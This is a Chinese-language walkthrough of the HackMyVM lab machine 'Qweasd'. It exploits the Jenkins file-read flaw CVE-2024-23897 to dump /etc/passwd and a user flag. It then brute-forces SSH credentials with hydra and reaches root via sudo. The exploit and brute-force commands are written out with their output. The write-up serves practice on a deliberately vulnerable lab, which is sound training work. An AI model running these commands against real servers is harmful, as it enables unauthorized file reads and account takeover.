简介
靶机名称:Qweasd
难度:中等
靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Qweasd
本地环境
虚拟机:vitual box
靶场IP(Qweasd):192.168.56.116
跳板机IP(windows 11):192.168.56.1 192.168.190.100
渗透机IP(ubuntu 22.04):192.168.190.30
扫描
nmap起手
nmap -p 1-65535 -T4 -A -v 192.168.56.116/32
http
CVE利用
发现是jenkins,网上搜了一下,发现很新的CVE
检测一下,可以直接执行
先读取一下passwd文件获取用户列表
./CVE-2024-23897 -url http://192.168.56.116:8080/ -c reload-job -a /etc/passwd
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin: No such item ‘messagebus:x:103:104::/nonexistent:/usr/sbin/nologin’ exists.
dnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin: No such item ‘dnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin’ exists.
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin: No such item ‘mail:x:8:8:mail:/var/mail:/usr/sbin/nologin’ exists.
pollinate:x:105:1::/var/cache/pollinate:/bin/false: No such item ‘pollinate:x:105:1::/var/cache/pollinate:/bin/false’ exists.
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin: No such item ‘_apt:x:100:65534::/nonexistent:/usr/sbin/nologin’ exists.
penetration:x:1001:1001::/home/penetration:/bin/bash: No such item ‘penetration:x:1001:1001::/home/penetration:/bin/bash’ exists.
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin: No such item ‘gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin’ exists.
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false: No such item ‘lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false’ exists.
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin: No such item ‘usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin’ exists.
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin: No such item ‘irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin’ exists.
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false: No such item ‘tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false’ exists.
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin: No such item ‘tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin’ exists.
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin: No such item ‘list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin’ exists.
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin: No such item ‘man:x:6:12:man:/var/cache/man:/usr/sbin/nologin’ exists.
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin: No such item ‘daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin’ exists.
sys:x:3:3:sys:/dev:/usr/sbin/nologin: No such item ‘sys:x:3:3:sys:/dev:/usr/sbin/nologin’ exists.
sync:x:4:65534:sync:/bin:/bin/sync: No such item ‘sync:x:4:65534:sync:/bin:/bin/sync’ exists.
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin: No such item ‘sshd:x:106:65534::/run/sshd:/usr/sbin/nologin’ exists.
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin: No such item ‘www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin’ exists.
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin: No such item ‘landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin’ exists.
kali:x:1000:1000:asd:/home/kali:/bin/bash: No such item ‘kali:x:1000:1000:asd:/home/kali:/bin/bash’ exists.
root:x:0:0:root:/root:/bin/bash: No such item ‘root:x:0:0:root:/root:/bin/bash’ exists.
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin: No such item ‘backup:x:34:34:backup:/var/backups:/usr/sbin/nologin’ exists.
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin: No such item ‘systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin’ exists.
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin: No such item ‘nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin’ exists.
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin: No such item ‘lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin’ exists.
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin: No such item ‘uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin’ exists.
syslog:x:107:113::/home/syslog:/usr/sbin/nologin: No such item ‘syslog:x:107:113::/home/syslog:/usr/sbin/nologin’ exists.
bin:x:2:2:bin:/bin:/usr/sbin/nologin: No such item ‘bin:x:2:2:bin:/bin:/usr/sbin/nologin’ exists.
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin: No such item ‘news:x:9:9:news:/var/spool/news:/usr/sbin/nologin’ exists.
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin: No such item ‘proxy:x:13:13:proxy:/bin:/usr/sbin/nologin’ exists.
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin: No such item ‘systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin’ exists.
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin: No such item ‘systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin’ exists.
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin: No such item ‘uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin’ exists.
games:x:5:60:games:/usr/games:/usr/sbin/nologin: No such item ‘games:x:5:60:games:/usr/games:/usr/sbin/nologin’ exists.
目前看来关键用户是kali
,root
,penetration
先读取用户的一个flag,闯过一关
./CVE-2024-23897 -url http://192.168.56.116:8080/ -c reload-job -a /home/penetration/user.txt
flag{Whynotjoinsomehackercommunicationgroups_}
爆破
得到用户列表之后就直接进行爆破,成功得到kali的密码
hydra -l kali -P $HVV_PATH/8_dict/kali.txt 192.168.56.116 ssh
提权
sudo su
,然后就成为root用户了……
kali@asd:~$ sudo su
[sudo] password for kali:
root@asd:/home/kali# cd ~/root.txt
bash: cd: /root/root.txt: Not a directory
root@asd:/home/kali# cd ~
root@asd:~# ls
root.txt snap
root@asd:~# cat root.txt
flag{Hackercommunicationgroup660930334iswaitingforyoutojoin_}
root@asd:~#
flag{Hackercommunicationgroup660930334iswaitingforyoutojoin_}